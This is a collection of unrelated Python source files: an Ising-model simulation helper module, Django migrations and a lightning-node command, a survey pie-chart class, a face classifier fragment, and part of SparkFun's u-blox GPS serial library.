        predictions = self.model(face.unsqueeze(0).to(self.device))
        predictions = predictions.cpu().detach().numpy()[0]
        best = int(np.argmax(predictions))
        return self.facedict[str(best)], predictions[best]
class Data(Dataset):
    """Thin Dataset wrapper over indexable rows of (image, label) pairs."""

    def __init__(self, data):
        # data: array-like where row[0] is the image and row[1] the label
        self.data = data

    def __len__(self):
        return self.data.shape[0]

    def __getitem__(self, idx):
        row = self.data[idx]
        return torch.tensor(row[0]), torch.tensor(int(row[1]))
class ModifiedResnet(nn.Module):
    """Embedding backbone (512-dim output) plus a softmax classification head."""

    def __init__(self, pretrained_model, labels_count):
        super(ModifiedResnet, self).__init__()
        self.pretrained_model = pretrained_model
        self.out_layer = nn.Linear(512, labels_count)
        self.softmax = nn.Softmax(dim=1)

    def forward(self, x):
        # Backbone embedding -> linear head -> per-class probabilities.
        embedding = self.pretrained_model(x)
        logits = self.out_layer(embedding)
        return self.softmax(logits)
# Module-level bootstrap: load existing weights, or train a head if missing.
frc = FaceRecognitionClassifier()
try:
    frc.get_model()
    _weights_loaded = True
except (FileNotFoundError, RuntimeError):
    # Missing or incompatible weights on disk: train a fresh head.
    print('Untrained model weights')
    frc.train_classifier(10)
    _weights_loaded = False

if __name__ == '__main__' and _weights_loaded:
    # Bug fix: the original retrained unconditionally here, so running as a
    # script with missing weights trained twice back to back.
    frc.train_classifier(10)
#!/usr/local/bin/python3
"""Print 63 random two-digit addition/subtraction exercises."""
import random

test_count = 63

for _ in range(test_count):
    left = str(random.randint(10, 99))
    right = str(random.randint(10, 99))
    # randint(0, 1): 0 -> '+', 1 -> '-' (same draw order as before)
    operator = '+' if random.randint(0, 1) == 0 else '-'
    print(left, operator, right)
#!/usr/bin/env python
import numpy as np
import os
import ext.progressbar as progressbar
from itertools import permutations
""" misc.py - Place some often reused functions here """
def drawwidget(discription, ljust=20):
    """Build the widget list used to format a progressbar.

    The description is left-justified to *ljust* characters so successive
    bars line up.
    """
    return [
        discription.ljust(ljust),
        progressbar.Percentage(),
        ' ',
        progressbar.Bar(marker='#', left='[', right=']'),
        ' ',
        progressbar.ETA(),
    ]
def product(iterable):
    """Return the product of all elements; 1 for an empty iterable."""
    result = 1
    for factor in iterable:
        result *= factor
    return result
def get_basename(filepath):
    """ If filepath = 'some_path/myfile.hdf5', then this returns 'myfile'. """
    return os.path.splitext(os.path.basename(filepath))[0]
def acf(ndarr, length=None):
    """
    Return normalized autocorrelation coefficients for lags range(1, length),
    preceded by 1.0 (the trivial lag-0 value, since lag=0 correlation is not
    computed directly).

    Parameters
    ----------
    ndarr : ndarray of shape (1,)
        Signal (typically time-series data) to autocorrelate.
    length : int, optional
        End of the lag interval range(1, length). Defaults to len(ndarr) - 1.

    The coefficients come from np.corrcoef; see
    http://docs.scipy.org/doc/numpy/reference/generated/numpy.corrcoef.html
    and
    https://en.wikipedia.org/wiki/Pearson_product-moment_correlation_coefficient
    """
    if not length:
        length = len(ndarr) - 1
    coeffs = [1.0]
    for lag in range(1, length):
        coeffs.append(np.corrcoef(ndarr[:-lag], ndarr[lag:])[0, 1])
    return np.array(coeffs)
def make_energy_map_2D():
    """
    Return the 2D site-energy lookup table:
    {(False, (False, False)): 2,
     (False, (False, True)): 0,
     (False, (True, False)): 0,
     (False, (True, True)): -2,
     (True, (False, False)): -2,
     (True, (False, True)): 0,
     (True, (True, False)): 0,
     (True, (True, True)): 2}
    Keyed by (site spin, (below, right) neighbor spins).
    """
    # Energy contribution for a True site given each neighbor configuration;
    # a False site contributes the negated value.
    base = {(True, True): 2, (True, False): 0, (False, False): -2}
    energy_map = dict()
    for config, energy in base.items():
        for perm in set(permutations(config)):
            energy_map[(True, perm)] = energy
            energy_map[(False, perm)] = -energy
    return energy_map
def make_energy_map_3D():
    """
    Return the 3D site-energy lookup table:
    {(False, (False, False, False)): 3,
     (False, (False, False, True)): 1,
     (False, (False, True, False)): 1,
     (False, (True, False, False)): 1,
     (False, (True, True, False)): -1,
     (False, (True, False, True)): -1,
     (False, (False, True, True)): -1,
     (False, (True, True, True)): -3,
     (True, (False, False, False)): -3,
     (True, (False, False, True)): -1,
     (True, (False, True, False)): -1,
     (True, (True, False, False)): -1,
     (True, (True, True, False)): 1,
     (True, (True, False, True)): 1,
     (True, (False, True, True)): 1,
     (True, (True, True, True)): 3}
    Keyed by (site spin, (below, right, front) neighbor spins).
    """
    # Energy contribution for a True site per neighbor configuration;
    # a False site contributes the negated value.
    base = {
        (True, True, True): 3,
        (True, True, False): 1,
        (True, False, False): -1,
        (False, False, False): -3,
    }
    energy_map = dict()
    for config, energy in base.items():
        for perm in set(permutations(config)):
            energy_map[(True, perm)] = energy
            energy_map[(False, perm)] = -energy
    return energy_map
def make_delta_energy_map_2D():
    """
    Return the 2D spin-flip energy-change table, keyed by
    (site spin, (four neighbor spins)). A True site surrounded by k True
    neighbors maps to 8 - 4*(4 - k) ... i.e. +8 for all-True down to -8 for
    all-False; a False site maps to the negated value. For example:
    (True, (True, True, True, True)) -> 8 and
    (False, (False, False, False, False)) -> 8.
    """
    # delta-E for a True site, by number of True neighbors (4..0).
    table = [
        ((True, True, True, True), 8),
        ((True, True, True, False), 4),
        ((True, True, False, False), 0),
        ((True, False, False, False), -4),
        ((False, False, False, False), -8),
    ]
    delta_energy_map = dict()
    for config, delta in table:
        for perm in set(permutations(config)):
            delta_energy_map[(True, perm)] = delta
            delta_energy_map[(False, perm)] = -delta
    return delta_energy_map
def make_delta_energy_map_3D():
    """ A straightforward addition to the 2D variant: six neighbors, so the
    flip energy runs from +12 (True site, all-True neighbors) down to -12,
    negated for a False site. """
    # delta-E for a True site, by number of True neighbors (6..0).
    table = [
        ((True,) * 6, 12),
        ((True, True, True, True, True, False), 8),
        ((True, True, True, True, False, False), 4),
        ((True, True, True, False, False, False), 0),
        ((True, True, False, False, False, False), -4),
        ((True, False, False, False, False, False), -8),
        ((False,) * 6, -12),
    ]
    dE_map = dict()
    for config, delta in table:
        for perm in set(permutations(config)):
            dE_map[(True, perm)] = delta
            dE_map[(False, perm)] = -delta
    return dE_map
def probability_table(shape, temperature):
    """
    Return a dictionary mapping each possible flip energy change to its
    Boltzmann acceptance factor exp(-dE / T).

    shape : tuple
        Lattice shape; only 2D and 3D lattices are supported.
    temperature : float
    """
    dimension = len(shape)
    if dimension == 2:
        delta_energies = (-8, -4, 0, 4, 8)
    elif dimension == 3:
        delta_energies = (-12, -8, -4, 0, 4, 8, 12)
    else:
        raise ValueError("No probability table for lattice shape: "
                         "{}".format(shape))
    return {energy: np.exp(-energy / temperature) for energy in delta_energies}
def neighbor_table(shape):
    """
    Return a dictionary mapping each site index to its tuple of helical
    nearest neighbors. For a 4x4 lattice, for example, site 0 maps to
    (1, 15, 4, 12) and site 9 to (10, 8, 13, 5).
    """
    dimension = len(shape)
    L = shape[0]
    dispatch = {2: nn_helical_bc_2D, 3: nn_helical_bc_3D}
    if dimension not in dispatch:
        raise Exception("Unsupported dimension: {}".format(dimension))
    nn_function = dispatch[dimension]
    return {site: nn_function(site, L) for site in range(product(shape))}
def nn_helical_bc_2D(site, width):
    """
    Return (below, above, right, left) neighbor indices of *site* on a
    width x width lattice stored as a flat array with helical boundary
    conditions: "below"/"above" are site +/- 1 and "right"/"left" are
    site +/- width, all wrapped modulo width**2. E.g. on a 4x4 lattice,
    nn_helical_bc_2D(9, 4) == (10, 8, 13, 5).

    site: int
    width: int
    """
    n_sites = width ** 2
    below = (site + 1) % n_sites
    above = (site - 1) % n_sites
    right = (site + width) % n_sites
    left = (site - width) % n_sites
    return below, above, right, left
def nn_helical_bc_3D(site, L):
    """
    Same idea as the 2D variant, extended to three dimensions: the six
    neighbors are site +/- 1, +/- L and +/- L**2, wrapped modulo L**3.
    """
    n_sites = L ** 3
    offsets = (1, -1, L, -L, L ** 2, -(L ** 2))
    return tuple((site + off) % n_sites for off in offsets)
def get_delta_energy_function(ising):
    """Return a closure delta_energy(site) giving the energy change of
    flipping *site*, using a precomputed neighbor table and lookup map
    captured over the live grid ``ising.grid``.
    """
    dimension = len(ising.shape)
    g = ising.grid
    if dimension not in (2, 3):
        raise Exception("Unsupported dimension: {}".format(dimension))
    nbr_table = neighbor_table(ising.shape)
    if dimension == 2:
        delta_energy_map = make_delta_energy_map_2D()

        def delta_energy(site):
            below, above, right, left = nbr_table[site]
            key = (bool(g[site]),
                   (bool(g[below]), bool(g[above]), bool(g[right]),
                    bool(g[left])))
            return delta_energy_map[key]
    else:
        delta_energy_map = make_delta_energy_map_3D()

        def delta_energy(site):
            below, above, right, left, front, back = nbr_table[site]
            key = (bool(g[site]),
                   (bool(g[below]), bool(g[above]), bool(g[right]),
                    bool(g[left]), bool(g[front]), bool(g[back])))
            return delta_energy_map[key]
    return delta_energy
def get_calc_energy_function(ising):
    """Return a zero-argument closure computing the total lattice energy
    H = -J * SUM(nearest neighbors), counting each bond once via the
    below/right (and front, in 3D) neighbors of every site.
    """
    dimension = len(ising.shape)
    g = ising.grid
    size = product(ising.shape)
    if dimension == 2:
        nbr_table = neighbor_table(ising.shape)
        energy_map = make_energy_map_2D()

        def calc_energy():
            """ Returns the total energy """
            total = 0
            for site in range(size):
                below, above, right, left = nbr_table[site]
                total += energy_map[(bool(g[site]),
                                     (bool(g[right]), bool(g[below])))]
            return -total  # H = -J*SUM(nearest neighbors); note the -J
    elif dimension == 3:
        nbr_table = neighbor_table(ising.shape)
        energy_map = make_energy_map_3D()

        def calc_energy():
            """ Returns the total energy """
            total = 0
            for site in range(size):
                below, above, right, left, front, back = nbr_table[site]
                total += energy_map[(bool(g[site]),
                                     (bool(g[right]), bool(g[below]),
                                      bool(g[front])))]
            return -total  # H = -J*SUM(nearest neighbors); note the -J
    else:
        raise Exception("Unsupported dimension: {}".format(dimension))
    return calc_energy
def print_sim_parameters(ising):
    """Print a human-readable summary of the simulation parameters of
    *ising* (shape, temperature, sweep/flip counts, save interval).

    Supports the 'metropolis' and 'wolff' modes; NOTE(review): any other
    mode leaves `simparams` unbound and the final print raises NameError.
    """
    sweeps = ising.sweeps
    width = ising.shape[0]
    height = ising.shape[1]
    lattice_size = width * height
    # NOTE(review): computed from the 2D size; for 3D lattices the printed
    # save interval is not rescaled by depth below -- confirm intent.
    saveinterval_in_iterations = lattice_size * ising.saveinterval
    total_iters = sweeps * lattice_size
    try:
        # 3D lattices carry a third dimension; 2D shapes raise IndexError
        # here (NameError is presumably unreachable -- kept from original).
        depth = ising.shape[2]
        lattice_size = width * height * depth
        total_iters = sweeps * lattice_size
    except (IndexError, NameError):
        pass
    if ising.mode == 'metropolis':
        simparams = """
        Algorithm          : {}
        Lattice Shape      : {}
        Lattice Size       : {}
        Temperature        : {}
        Sweeps to perform  : {} (1 sweep = {} iterations)
        Total Iterations   : {} ({} * {} * {})
        Saving state every : {} sweeps (every {} iterations)
        """.format(ising.mode, ising.shape, lattice_size,
                   ising.temperature,
                   sweeps, lattice_size, total_iters, sweeps, width, height,
                   ising.saveinterval, saveinterval_in_iterations)
    elif ising.mode == 'wolff':
        # In Wolff mode `sweeps` counts cluster flips rather than sweeps.
        simparams = """
        Algorithm          : {}
        Lattice Shape      : {}
        Lattice Size       : {}
        Temperature        : {}
        Cluster flips      : {}
        Saving state every : {} cluster flips
        """.format(ising.mode, ising.shape, lattice_size,
                   ising.temperature, sweeps, ising.saveinterval)
    print(simparams)
#TODO
#3D version
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand, CommandError
from lightning import LightningRpc
from charged.api import Ln
from django.conf import settings
class Command(BaseCommand):
    """Management command that prints `getinfo` from the lightning node."""

    help = 'lightning info'

    def handle(self, *args, **options):
        # Query the node through the charged API wrapper and dump the result.
        info = Ln().getinfo()
        print(info)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Initial schema for the test project: two related resources plus a
    # TestResource joined to them via FK and one-to-one links. Auto-generated
    # migration -- field order defines column order; do not reorder.

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='RelatedResource1',
            fields=[
                ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
                ('name', models.CharField(max_length=255)),
                ('active', models.BooleanField(default=True)),
            ],
        ),
        migrations.CreateModel(
            name='RelatedResource2',
            fields=[
                ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
                ('name', models.CharField(max_length=255)),
                ('active', models.BooleanField(default=True)),
                # M2M creates a separate join table to RelatedResource1.
                ('related_resources_1', models.ManyToManyField(to='testproject.RelatedResource1')),
            ],
        ),
        migrations.CreateModel(
            name='TestResource',
            fields=[
                ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
                ('name', models.CharField(max_length=255)),
                ('related_resource_1', models.ForeignKey(to='testproject.RelatedResource1', on_delete=models.CASCADE)),
                ('related_resource_2', models.OneToOneField(to='testproject.RelatedResource2', on_delete=models.CASCADE)),
            ],
        ),
    ]
|
# Generated by Django 2.2.19 on 2021-03-19 11:28
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
    # Renames the Answers model to the singular Answer. Auto-generated;
    # depends on the user model because earlier 'home' migrations reference it.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('home', '0003_answers_question'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='Answers',
            new_name='Answer',
        ),
    ]
|
# Collect the values that occur exactly once in the list.
from collections import Counter

my_list_1 = [2, 2, 5, 12, 8, 2, 12]
# Count occurrences of each value (Counter is a dict keyed by value).
my_dict_1 = Counter(my_list_1)
# Final list: values whose count is exactly 1, in deterministic
# first-occurrence order (the original iterated an unordered set of keys).
final_list = [number for number, count in my_dict_1.items() if count == 1]
print(final_list)
import matplotlib.pyplot as plt
import datetime
import json
import os
PIE_COLOR = ['#ff9999', '#99ff99', '#ffcc99']
SURVEY_FIELDS = ['good', 'neutral', 'bad']
class Survey:
    """Collect button-click survey responses; summarize, save, and plot them.

    All print calls use function syntax so the module runs on both Python 2
    and Python 3 (the original used Python-2-only print statements).
    """

    def __init__(self, save_path):
        """
        :param save_path: Where information should be saved
        """
        self.survey_information = {'full_information': list(),
                                   'result': {'good': 0,
                                              'neutral': 0,
                                              'bad': 0}}
        self.save_path = save_path

    def register_click(self, button):
        """Register a button click; unknown buttons are reported and ignored."""
        if button not in self.survey_information['result']:
            print("Bad button call")
            return
        reg_time = datetime.datetime.now()
        reg_time = reg_time.strftime('%d/%m/%Y, %H:%M:%S')
        self.survey_information['full_information'].append({'time': reg_time,
                                                            'button': button})
        self.survey_information['result'][button] += 1

    def save_survey(self):
        """Save the survey information data as pretty-printed JSON."""
        save_str = json.dumps(self.survey_information, indent=2, sort_keys=True)
        full_save_path = os.path.join(self.save_path, 'survey_information.txt')
        with open(full_save_path, 'w+') as f:
            f.write(save_str)
        print('Saving survey data to: ' + full_save_path)

    def print_survey(self):
        """Print survey information; safe to call before any clicks."""
        total_clicks = 0
        for field in SURVEY_FIELDS:
            total_clicks += self.survey_information['result'][field.lower()]
        print(50 * '-')
        print('Survey summary')
        if total_clicks == 0:
            # Robustness fix: the original divided by zero with no clicks.
            print('No survey responses recorded')
        else:
            for field in SURVEY_FIELDS:
                v = self.survey_information['result'][field.lower()]
                print('%d people (%.1f%%) thought the event was %s' % (v, 100.0 * v / total_clicks, field))
        print(50 * '-')

    def plot_pie_chart(self):
        """Plot and save a pie chart of the survey result"""
        # Labels and sizes are built from the same sorted key order so that
        # each wedge matches its label.
        labels = [label.capitalize() for label in self.survey_information['result'].keys()]
        labels = sorted(labels)
        sizes = [self.survey_information['result'][label] for label in sorted(self.survey_information['result'].keys())]
        # Pop out the pie charts
        explode = (0.05, 0.05, 0.05)
        # Plot pie chart
        fig1, ax1 = plt.subplots()

        def make_autopct(values):
            # Render each wedge as "percent (count)".
            def my_autopct(pct):
                total = sum(values)
                val = int(round(pct * total / 100.0))
                return '{p:.1f}% ({v:d})'.format(p=pct, v=val)
            return my_autopct

        _, texts, pct = ax1.pie(sizes, colors=PIE_COLOR, labels=labels, autopct=make_autopct(sizes), startangle=90,
                                explode=explode, pctdistance=0.7)
        # Set sizes of percentage and text
        [_.set_fontsize(14) for _ in pct]
        [_.set_fontsize(18) for _ in texts]
        # Draw a circle in the middle (donut look) with a centered title.
        centre_circle = plt.Circle((0, 0), 0.5, fc='white')
        plt.text(-0.3, -0.075, "Result", fontsize=24, fontweight='bold')
        fig = plt.gcf()
        fig.gca().add_artist(centre_circle)
        # Equal aspect ratio ensures that pie is drawn as a circle
        ax1.axis('equal')
        plt.tight_layout()
        print("Plot done")
        self.save_figure(fig, 'pie_chart.svg')
        plt.close('all')
        print("Figured saved")

    def save_figure(self, fig, fig_name):
        """
        Save figure under <save_path>/images/.

        :param fig: fig object
        :param fig_name: file name of the figure
        :return:
        """
        fig.savefig(os.path.join(self.save_path, 'images', fig_name), format='svg', dpi=1000)
|
# Python library for the SparkFun's line of u-Blox GPS units.
#
# SparkFun GPS-RTK NEO-M8P:
# https://www.sparkfun.com/products/15005
# SparkFun GPS-RTK2 ZED-F9P:
# https://www.sparkfun.com/products/15136
# SparkFun GPS ZOE-M8Q:
# https://www.sparkfun.com/products/15193
# SparkFun GPS SAM-M8Q:
# https://www.sparkfun.com/products/15210
# SparkFun GPS-RTK Dead Reckoning Phat ZED-F9R:
# https://www.sparkfun.com/products/16475
# SparkFun GPS-RTK Dead Reckoning ZED-F9R:
# https://www.sparkfun.com/products/16344
# SparkFun GPS Dead Reckoning NEO-M9N:
# https://www.sparkfun.com/products/15712
#
#------------------------------------------------------------------------
# Written by SparkFun Electronics, July 2020
#
# Do you like this library? Help support SparkFun. Buy a board!
#==================================================================================
# Copyright (c) 2020 SparkFun Electronics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#==================================================================================
#
# This is mostly a port of existing Arduino functionality, so pylint is sad.
# The goal is to keep the public interface pythonic, but internal is internal
#
# pylint: disable=line-too-long, bad-whitespace, invalid-name, too-many-public-methods
#
import struct
import serial
import spidev
import threading
import time
import collections
import sys
import traceback
from . import sfeSpiWrapper
from . import sparkfun_predefines as sp
from . import core
class UbloxGps(object):
"""
UbloxGps
Initialize the library with the given port.
:param hard_port: The port to use to communicate with the module, this
can be a serial or SPI port. If no port is given, then the library
assumes serial at a 38400 baud rate.
:return: The UbloxGps object.
:rtype: Object
"""
MAX_NMEA_LINES = 50
MAX_ERRORS = 5
    def __init__(self, hard_port = None):
        """Set up the communication port, field-scaling table, message
        registries, and start the background packet-reader thread.

        :param hard_port: serial or SPI port object; None selects a serial
            port at 38400 baud.
        """
        if hard_port is None:
            # NOTE(review): "/dev/serial0/" has a trailing slash -- likely
            # intended to be "/dev/serial0"; confirm on target hardware.
            self.hard_port = serial.Serial("/dev/serial0/", 38400, timeout=1)
        elif type(hard_port) == spidev.SpiDev:
            # NOTE(review): sfeSpiWrapper is imported as a module and called
            # here -- presumably it is (or exposes) a callable wrapper class;
            # confirm against the sfeSpiWrapper module.
            sfeSpi = sfeSpiWrapper(hard_port)
            self.hard_port = sfeSpi
        else:
            self.hard_port = hard_port
        # Bounded buffers: oldest NMEA lines / worker errors drop off first.
        self.nmea_line_buffer = collections.deque(maxlen=UbloxGps.MAX_NMEA_LINES)
        self.worker_exception_buffer = collections.deque(maxlen=UbloxGps.MAX_ERRORS)
        # Scale factors applied by scale_packet() to raw integer payload
        # fields to convert them to conventional units.
        self.pckt_scl = {
            'lon'      : (10**-7),
            'lat'      : (10**-7),
            'headMot'  : (10**-5),
            'headAcc'  : (10**-5),
            'pDOP'     : 0.01,
            'gDOP'     : 0.01,
            'tDOP'     : 0.01,
            'vDOP'     : 0.01,
            'hDOP'     : 0.01,
            'nDOP'     : 0.01,
            'eDOP'     : 0.01,
            'headVeh'  : (10**-5),
            'magDec'   : (10**-2),
            'magAcc'   : (10**-2),
            'lonHp'    : (10**-9),
            'latHp'    : (10**-9),
            'heightHp' : 0.1,
            'hMSLHp'   : 0.1,
            'hAcc'     : 0.1,
            'vAcc'     : 0.1,
            'errEllipseOrient': (10**-2),
            'ecefX'    : 0.1,
            'ecefY'    : 0.1,
            'ecefZ'    : 0.1,
            'pAcc'     : 0.1,
            'prRes'    : 0.1,
            'cAcc'     : (10**-5),
            'heading'  : (10**-5),
            'relPosHeading' : (10**-5),
            'relPosHPN'     : 0.1,
            'relPosHPE'     : 0.1,
            'relPosHPD'     : 0.1,
            'relPosHPLength' : 0.1,
            'accN'     : 0.1,
            'accE'     : 0.1,
            'accD'     : 0.1,
            'accLength' : 0.1,
            'accPitch' : (10**-5),
            'accHeading' : (10**-5),
            'roll'     : (10**-5),
            'pitch'    : (10**-5),
        }
        #packet storage
        self.packets = {}
        # Class message values
        self.cls_ms = {}
        #class message list for auto-update
        self.cls_ms_auto = {}
        tmp_all_cls = []
        # Index the predefined message classes by name so send/receive can
        # translate (class name, message name) into protocol ids.
        for (k,v) in vars(sp).items():
            if isinstance(v, core.Cls):
                tmp_all_cls.append(v);
                self.packets[v.name] = {}
                self.cls_ms_auto[v.name] = []
                self.cls_ms[v.name] = (v.id_, {})
                for (mk, mv) in v._messages.items():
                    self.cls_ms[v.name][1][mv.name] = mk
        self.parse_tool = core.Parser(tmp_all_cls)
        # Daemon reader thread: dies with the interpreter; stop() joins it.
        self.stopping = False
        self.thread = threading.Thread(target=self.run_packet_reader, args=())
        self.thread.daemon = True
        self.thread.start()
def set_packet(self, cls_name, msg_name, payload):
if (payload is None):
if msg_name in self.packets[cls_name]:
del self.packets[cls_name][msg_name]
else:
self.packets[cls_name][msg_name] = payload
def wait_packet(self, cls_name, msg_name, wait_time):
if wait_time < 0 or wait_time is None:
wait_time = 0
orig_tm = time.monotonic()
while (not(msg_name in self.packets[cls_name])):
time.sleep(0.05)
if ((time.monotonic() - orig_tm) >= wait_time / 1000.0 ):
break
return self.packets[cls_name][msg_name] if msg_name in self.packets[cls_name] else None
    def run_packet_reader(self):
        """Background thread body: continuously read the port, routing NMEA
        sentences into nmea_line_buffer and UBX packets into self.packets.
        Exceptions are recorded in worker_exception_buffer for the main
        thread to re-raise (see request_standard_packet).
        """
        # c2 is a sliding window of the last two raw bytes read.
        c2 = bytes()
        while True:
            try:
                if (self.stopping):
                    break
                c2 = c2 + self.hard_port.read(1)
                c2 = c2[-len(core.Parser.PREFIX):] # keep just 2 bytes, dump the rest
                if (c2[-1:] == b'$'):
                    # '$' starts an NMEA sentence, terminated by CRLF.
                    nmea_data = core.Parser._read_until(self.hard_port, b'\x0d\x0a')
                    try:
                        self.nmea_line_buffer.append('$' + nmea_data.decode('utf-8').rstrip(' \r\n'))
                    except:
                        pass #we just ignore bad messages, we don't ignore communication issues though
                    c2 = b''
                elif (c2 == core.Parser.PREFIX):
                    # UBX sync bytes seen: hand the stream to the parser.
                    cls_name, msg_name, payload = self.parse_tool.receive_from(self.hard_port, True, True)
                    if not(cls_name is None or msg_name is None or payload is None):
                        #print(cls_name, msg_name)
                        self.set_packet(cls_name, msg_name, payload)
                if (self.stopping):
                    break
                time.sleep(0.01)
            except: # catch *all* exceptions
                # Record the error for the main thread instead of dying.
                self.worker_exception_buffer.append(sys.exc_info())
                if (self.stopping):
                    break
    def stop(self):
        """Signal the reader thread to exit and wait for it to finish."""
        self.stopping = True
        self.thread.join()
    def __enter__(self):
        # Context-manager entry: the object itself is the resource.
        return self
    def __exit__(self, type, value, tb):
        # Context-manager exit: always shut down the reader thread.
        self.stop()
def send_message(self, cls_name, msg_name, ubx_payload = None):
"""
Sends a ublox message to the ublox module.
:param cls_name: The ublox class with which to send or receive the
message to/from.
:param msg_name: The message name under the ublox class with which
to send or receive the message to/from.
:param ubx_payload: The payload to send to the class/id specified. If
none is given than a "poll request" is
initiated.
:return: True on completion
:rtype: boolean
"""
ubx_class_id = self.cls_ms[cls_name][0] #convert names to ids
ubx_id = self.cls_ms[cls_name][1][msg_name]
SYNC_CHAR1 = 0xB5
SYNC_CHAR2 = 0x62
if ubx_payload == b'\x00':
ubx_payload = None
if ubx_payload is None:
payload_length = 0
elif isinstance(ubx_payload, list):
ubx_payload = bytes(ubx_payload)
payload_length = len(ubx_payload)
elif not(isinstance(ubx_payload, bytes)):
ubx_payload = bytes([ubx_payload])
payload_length = len(ubx_payload)
else:
payload_length = len(ubx_payload)
message = bytes((SYNC_CHAR1, SYNC_CHAR2,
ubx_class_id, ubx_id, (payload_length & 0xFF),
(payload_length >> 8)))
if payload_length > 0:
message = message + ubx_payload
checksum = core.Parser._generate_fletcher_checksum(message[2:])
self.hard_port.write(message + checksum)
return True
    def request_standard_packet(self, cls_name, msg_name, ubx_payload = None, wait_time = 2500, rethrow_thread_exception = True):
        """
        Sends a poll request for the ubx_class_id class with the ubx_id Message ID and
        parses ublox messages for the response. The payload is extracted from
        the response which is then scaled and passed to the user.

        :param cls_name: ublox class name (e.g. 'NAV').
        :param msg_name: message name within that class.
        :param ubx_payload: optional request payload; a single NUL byte is
            treated as "no payload".
        :param wait_time: reply timeout in milliseconds.
        :param rethrow_thread_exception: NOTE(review) -- accepted but never
            read; worker exceptions are always re-raised below. Confirm intent.
        :return: The payload of the ubx_class_id Class and ubx_id Message ID
        :rtype: namedtuple
        """
        if ubx_payload == b'\x00':
            ubx_payload = None
        # Auto-updated messages stream in on their own; only clear the slot
        # and re-poll when this message is not auto-updated (or has a payload).
        if not(msg_name in self.cls_ms_auto[cls_name] and ubx_payload is None):
            self.set_packet(cls_name, msg_name, None)
            self.send_message(cls_name, msg_name, ubx_payload)
        orig_packet = self.wait_packet(cls_name, msg_name, wait_time);
        # Surface any exception the reader thread recorded while we waited.
        if len(self.worker_exception_buffer) > 0:
            err = self.worker_exception_buffer.popleft()
            raise err[1].with_traceback(err[2])
        return self.scale_packet(orig_packet) if not(orig_packet is None) else None
def scale_packet(self, packet):
dict_packet = packet._asdict()
isdirty = False
for (k,v) in dict_packet.items():
if k in self.pckt_scl:
isdirty = True
dict_packet[k] = self.pckt_scl[k] * v
return type(packet)(**dict_packet) if isdirty else packet #we only need to reallocate and rebuild packet if it was changed
def stream_nmea(self, wait_for_nmea = True):
while wait_for_nmea and len(self.nmea_line_buffer) == 0:
time.sleep(0.05)
return self.nmea_line_buffer.popleft() if len(self.nmea_line_buffer) > 0 else None
def ubx_get_val(self, key_id, layer = 0, wait_time = 2500):
"""
This function takes the given key id and breakes it into individual bytes
which are then cocantenated together. This payload is then sent along
with the CFG Class and VALGET Message ID to send_message(). Ublox
Messages are then parsed for the requested values or a NAK signifying a
problem.
:return: The requested payload or a NAK on failure.
:rtype: namedtuple
"""
# layer 0 (RAM) and layer 7 (Default)! are the only options
if layer != 7:
layer = 0
payloadCfg = [0,layer,0,0,
(key_id) & 255,
(key_id >> 8) & 255,
(key_id >> 16) & 255,
(key_id >> 24) & 255
]
return self.request_standard_packet('CFG', 'VALGET', bytes(payloadCfg), wait_time = wait_time) #we return result immediately, hope get_val request won't overlap
def ubx_set_val(self, key_id, ubx_payload, layer = 7, wait_time = 2500):
"""
This function takes the given key id and breakes it into individual bytes
which are then cocantenated together. This payload is then sent along
with the CFG Class and VALSET Message ID to send_message(). Ublox
Messages are then parsed for the requested values or a NAK signifying a
problem.
:return: None
:rtype: namedtuple
"""
if ubx_payload is None:
return
elif isinstance(ubx_payload, list):
ubx_payload = bytes(ubx_payload)
elif not(isinstance(ubx_payload, bytes)):
ubx_payload = bytes([ubx_payload])
if len(ubx_payload) == 0:
return
payloadCfg = [0,layer,0,0,
(key_id) & 255,
(key_id >> 8) & 255,
(key_id >> 16) & 255,
(key_id >> 24) & 255
]
self.request_standard_packet('CFG', 'VALSET', bytes(payloadCfg) + ubx_payload, wait_time = wait_time)
def set_auto_msg(self, cls_name, msg_name, freq, wait_time = 2500):
ubx_class_id = self.cls_ms[cls_name][0] #convert names to ids
ubx_id = self.cls_ms[cls_name][1][msg_name]
if freq is None:
freq = 0
elif isinstance(freq, bool):
freq = 1 if freq else 0
elif freq < 0:
freq = 0
if msg_name in self.cls_ms_auto[cls_name]:
self.cls_ms_auto[cls_name].remove(msg_name)
if freq > 0:
self.cls_ms_auto[cls_name].append(msg_name)
payloadCfg = [ubx_class_id, ubx_id, freq]
self.request_standard_packet('CFG', 'MSG', payloadCfg, wait_time = wait_time)
    # ------------------------------------------------------------------
    # Thin convenience wrappers. Each one polls a single UBX message via
    # request_standard_packet() and returns its scaled payload namedtuple
    # (or None if no response arrived within wait_time).
    # ------------------------------------------------------------------
    def geo_coords(self, wait_time = 2500):
        # NAV-PVT -- same request as date_time(); the packet carries both
        return self.request_standard_packet('NAV', 'PVT', wait_time = wait_time)
    def hp_geo_coords(self, wait_time = 2500):
        # NAV-HPPOSLLH
        return self.request_standard_packet('NAV', 'HPPOSLLH', wait_time = wait_time)
